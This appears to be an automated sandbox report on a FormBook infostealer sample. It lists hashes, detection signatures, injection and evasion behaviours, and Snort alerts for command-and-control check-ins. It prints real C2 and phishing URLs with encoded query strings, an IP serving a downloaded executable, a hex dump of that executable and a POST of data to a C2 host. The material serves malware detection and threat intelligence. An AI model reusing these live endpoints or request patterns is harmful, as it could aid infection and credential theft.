Windows Analysis Report
8hd98EhtIFcYkb8.exe

Overview

General Information

Sample name:	8hd98EhtIFcYkb8.exe
Analysis ID:	1465534
MD5:	677b2d2d3a54e0c1d8e416b276093fb3
SHA1:	22b6aa9e97cf16d55aa16dcc20fea67f9806d09c
SHA256:	c42f31c68ee4a14aec74ddce249314d00813289dc36740484b09ceadf72aa0f8
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 8hd98EhtIFcYkb8.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.foryourhealth19.com/ym7q/	Avira URL Cloud: Label: malware
Source: http://www.ridcoredry.live/blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hv	Avira URL Cloud: Label: phishing
Source: http://www.foryourhealth19.com/ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf	Avira URL Cloud: Label: malware
Source: http://www.ridcoredry.live/blq3/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for submitted file

Source: 8hd98EhtIFcYkb8.exe

ReversingLabs: Detection: 28%

Yara detected FormBook

Source: Yara match	File source: 25.2.aj34fjqh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.8hd98EhtIFcYkb8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.aj34fjqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1431852540.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3534960934.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3691864413.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3530426239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3705299437.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1431338720.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3708009401.0000000005850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3705534069.0000000004500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1433410329.00000000020C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3705085363.0000000002DB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\EuOdzX7Ehz6t1H3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 8hd98EhtIFcYkb8.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: 8hd98EhtIFcYkb8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8hd98EhtIFcYkb8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: XOyN.pdb source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr
Source:	Binary string: chkntfs.pdbGCTL source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357259966.000000000055E000.00000002.00000001.01000000.0000000D.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3691801922.000000000055E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 8hd98EhtIFcYkb8.exe, 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: chkntfs.pdb source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: XOyN.pdbSHA256 source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr

Source: C:\Windows\SysWOW64\chkntfs.exe

Code function: 14_2_005ABE80 FindFirstFileW,FindNextFileW,FindClose,

14_2_005ABE80

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exe	Code function: 4x nop then jmp 026E23FCh	0_2_026E2698
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 4x nop then xor eax, eax	14_2_00599790
Source: C:\Windows\SysWOW64\chkntfs.exe	Code function: 4x nop then mov ebx, 00000004h	14_2_045F053E

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49712 -> 217.160.0.31:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64459 -> 172.67.194.145:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64463 -> 38.55.194.30:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64467 -> 46.30.215.51:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64471 -> 74.208.236.162:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64475 -> 192.250.231.28:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64479 -> 162.0.238.43:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64484 -> 43.198.80.127:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64488 -> 45.130.41.249:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64492 -> 91.195.240.123:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:64496 -> 38.207.19.49:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.tufftiff.xyz

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 17:26:06 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 27 Jun 2024 06:51:42 GMTETag: "aaa00-61bd9903d370d"Accept-Ranges: bytesContent-Length: 698880Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 20 ef 82 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a0 0a 00 00 08 00 00 00 00 00 00 be bf 0a 00 00 20 00 00 00 c0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c bf 0a 00 4f 00 00 00 00 c0 0a 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0a 00 0c 00 00 00 40 9e 0a 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 9f 0a 00 00 20 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 c0 0a 00 00 06 00 00 00 a2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0a 00 00 02 00 00 00 a8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 bf 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 d4 8c 00 00 2c 6c 00 00 03 00 00 00 14 00 00 06 00 f9 00 00 40 a5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 02 72 01 00 00 70 73 15 00 00 0a 7d 01 00 00 04 02 14 7d 02 00 00 04 02 28 16 00 00 0a 00 00 02 28 05 00 00 06 00 2a 13 30 07 00 a9 01 00 00 01 00 00 11 00 02 7b 01 00 00 04 6f 17 00 00 0a 00 72 bc 00 00 70 02 7b 01 00 00 04 73 18 00 00 0a 0a 06 6f 19 00 00 0a 0b 2b 1a 00 02 7b 16 00 00 04 6f 1a 00 00 0a 07 16 6f 1b 00 00 0a 6f 1c 00 00 0a 26 00 07 6f 1d 00 00 0a 13 04 11 04 2d da 02 7b 01 00 00 04 6f 1e 00 00 0a 00 02 7b 01 00 00 04 6f 17 00 00 0a 00 72 f2 00 00 70 02 7b 01 00 00 04 73 18 00 00 0a 0c 08 6f 19 00 00 0a 0d 38 0b 01 00 00 00 02 7b 04 00 00 04 6f 1f 00 00 0a 72 93 01 00 70 6f 20 00 00 0a 6f 21 00 00 0a 72 a5 01 00 70 17 8d 18 00 00 01 25 16 09 16 6f 1b 00 00 0a a2 6f 22 00 00 0a 26 02 7b 04 00 00 04 6f 1f 00 00 0a 72 93 01 00 70 6f 20 00 00 0a 6f 21 00 00 0a 72 b5 01 00 70 17 8d 18 00 00 01 25 16 09 17 6f 1b 00 00 0a a2 6f 22 00 00 0a 26 02 7b 04 00 00 04 6f

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.0.238.43 162.0.238.43
Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: LILLY-ASUS LILLY-ASUS
Source: Joe Sandbox View	ASN Name: ONECOMDK ONECOMDK
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101
Source: unknown	TCP traffic detected without corresponding DNS query: 185.234.72.101

Source: global traffic	HTTP traffic detected: GET /ky1l/?Lb=GFtlIrHx8T50&FTP84=rq50Wd1lMHFX8odFqcPFBXSYTeLeWZzOZdEKt1q2Ng0jiW/1UU7Cv6Tb1vTcZWKNTv6a7aX5qQrtM6kOVx9AgvgUe5/Bja5gpUFr8IDyktkkvNGNZ4xEuXwKitfXYUFnVmIVCEjvmGcp HTTP/1.1Host: www.erhaltungsmassage.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /ym7q/?Lb=GFtlIrHx8T50&FTP84=UxZF11kgGMhVJ3h1mYaBYZj5xwuySTV9/R2JXFp47AYwysMhWE1l+EvBnUyCPTtksKPA2Ite2ltCL7XTNGD56H2fTiCax6/BQq0vjYK7AyFfq6kTJWJKbnRCSHQhd4Mpl36RQO9kaMTf HTTP/1.1Host: www.foryourhealth19.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /80eg/?Lb=GFtlIrHx8T50&FTP84=/gUd74TM946IZLQfFCjFFoMEh/bZ058Y5fxYbd7lsAuEu+8WJ/21FtYOGJlKUg3YeQ1lkwlhlDEwsFjwCVkjP3HgvWH+eFvT+Cr55kx1O3kSIIeygKzK78qTqiVgNqoEH3t5dFc0+pi4 HTTP/1.1Host: www.86wqi.cyouAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /e5cg/?FTP84=+iRPR6b0cHsvtSIKktiBhFksQ3J0g8xQjEPnQEYx5YYVoEZd7QcDm2acLw7Tj1bPoKM8M2uZ1cEL1EuWaogQQhFlafU2EKFDhhDWP+Lh20TqHHOR+DrFC95KlJHLt9tMC+FdDZkSCqct&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.vivaepicmarbella.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /u4jq/?Lb=GFtlIrHx8T50&FTP84=CDJU9pFFzFP5Q+XwrjtzU7ALaZIX7Qr7xG0Tk3i+702mxinN9hpFEu+s7zPr8ql7seaWvhcu7+p+54MBjhZ2jhTmPmJLv4ka4ysGmOJ/DhiKAPXXpWbDV/sLTxWyGr8frfPdUs+6sgZH HTTP/1.1Host: www.lookstudiov.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /b9jt/?FTP84=I6wqk3vZ0MIwducyeDc5a1RUJrCEqnXhmjD4iKeo+QzF3CVziIh9NSuBhJSHyIOtb6QEc0JQU3wLuke4KM9e0eKAxB2ADTUoySVeubTpqpeKSrgjLWx1k8qzQ8FFILh8qZ99MFd/cRWi&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.cr-pos.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /vwgn/?FTP84=5ueMAWSl8HCdHaQ4ISZ1AQXhc5gyPvE6M+De+X7bZoAB9UCIok5O2fARcoTif8zUuE/VgVKiECkkSJ85U3W5QFFnp/YrlC4tzeltTmpoeWoUEn2HXZmMuQrIM+LIMwiHVH8SJcx756eW&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.tufftiff.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /EuOdzX7Ehz6t1H3.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.234.72.101Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /i6sl/?Lb=GFtlIrHx8T50&FTP84=qssHGV29j0ZCAjpN6QtzDw+gnCiynPmFES/c0m6mTWJ8eKXYeJPjMTEVk7GvbqhDwPeBMRZatQ3ofr/5XjUfaZC8rCPfXyoknOgmUV1BLU/3HLT18Q+LgoHdoh8bcR/ofs2EqraVghMO HTTP/1.1Host: www.botokkkd4.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /1cpo/?FTP84=XWpmZSZkQQ3crjSg4jO9FnvqfvQgDjUUlmKrUzlk+2X+Pq/xYmmvIQcMng+aGKp/N3zIo6PNXS6jtUQwBpM9XRiN/OVETSVEN1Q9JXY1u8NKleTflw9Of0xlNOdKZA91JkeaJQbbmRkx&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.cvt-auto.ruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /blq3/?Lb=GFtlIrHx8T50&FTP84=/QAAm0GouadCsSjm0XCQ0NNd9BYFgPCeNdHOqYXBISGV1GFo4SB1zqqUvhYZ4jEo/5lijPf3qt+9x6u7W4DslmBYMZTBtvuPQphb+44RgWDcLgkceETeTezSGqdjX9slNk8GIp6396hv HTTP/1.1Host: www.ridcoredry.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /vgf2/?FTP84=F0TubYbkra/fLGHNqtnaeYyDjBSRDaIxGedz+B7Iv0bejpDurJsW0bbpyLvpmMVlmiWzO1GtHUuGPki2goMxppGKi6uI7uQ9xVSgz+G1kxpEA95r9Q5H+Hhz7gAx2pLrWkb0si+rio1X&Lb=GFtlIrHx8T50 HTTP/1.1Host: www.filmbrute.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.erhaltungsmassage.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.oyoing.com
Source: global traffic	DNS traffic detected: DNS query: www.foryourhealth19.com
Source: global traffic	DNS traffic detected: DNS query: www.oudcafeae.online
Source: global traffic	DNS traffic detected: DNS query: www.86wqi.cyou
Source: global traffic	DNS traffic detected: DNS query: www.vivaepicmarbella.com
Source: global traffic	DNS traffic detected: DNS query: www.lookstudiov.com
Source: global traffic	DNS traffic detected: DNS query: www.cr-pos.com
Source: global traffic	DNS traffic detected: DNS query: www.antifabricated.com
Source: global traffic	DNS traffic detected: DNS query: www.tufftiff.xyz
Source: global traffic	DNS traffic detected: DNS query: www.botokkkd4.top
Source: global traffic	DNS traffic detected: DNS query: www.cvt-auto.ru
Source: global traffic	DNS traffic detected: DNS query: www.ridcoredry.live
Source: global traffic	DNS traffic detected: DNS query: www.filmbrute.com
Source: global traffic	DNS traffic detected: DNS query: www.xn--gotopia-bya.com

Source: unknown

HTTP traffic detected: POST /ym7q/ HTTP/1.1Host: www.foryourhealth19.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeContent-Length: 218Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.foryourhealth19.comReferer: http://www.foryourhealth19.com/ym7q/User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like GeckoData Raw: 46 54 50 38 34 3d 5a 7a 78 6c 32 43 63 4e 63 4a 67 36 42 46 64 51 70 66 6d 36 4c 4c 66 68 33 56 53 54 54 32 6b 69 69 69 50 6c 59 53 30 5a 6d 51 51 68 31 4d 6f 72 58 48 64 66 2b 55 6a 61 73 56 47 63 5a 42 6b 31 72 37 4c 2b 31 2b 74 4b 7a 53 52 57 48 34 69 6d 42 31 57 47 78 47 6d 38 49 54 36 37 73 72 2f 31 41 2b 41 41 6f 61 61 74 4f 67 6c 4c 73 34 6f 46 4c 31 56 34 4c 6d 63 63 4b 32 73 6c 52 4c 46 35 6a 6e 32 6c 53 65 30 70 59 2b 47 66 64 4d 61 31 53 6c 62 53 45 66 31 67 62 34 53 68 31 30 6e 62 79 42 59 64 43 46 48 37 53 4c 68 59 61 55 53 7a 39 76 44 5a 61 67 4a 6d 72 58 58 65 44 63 6f 2f 35 2b 75 66 6d 43 6d 41 55 48 78 79 63 56 4c 34 4a 77 3d 3d Data Ascii: 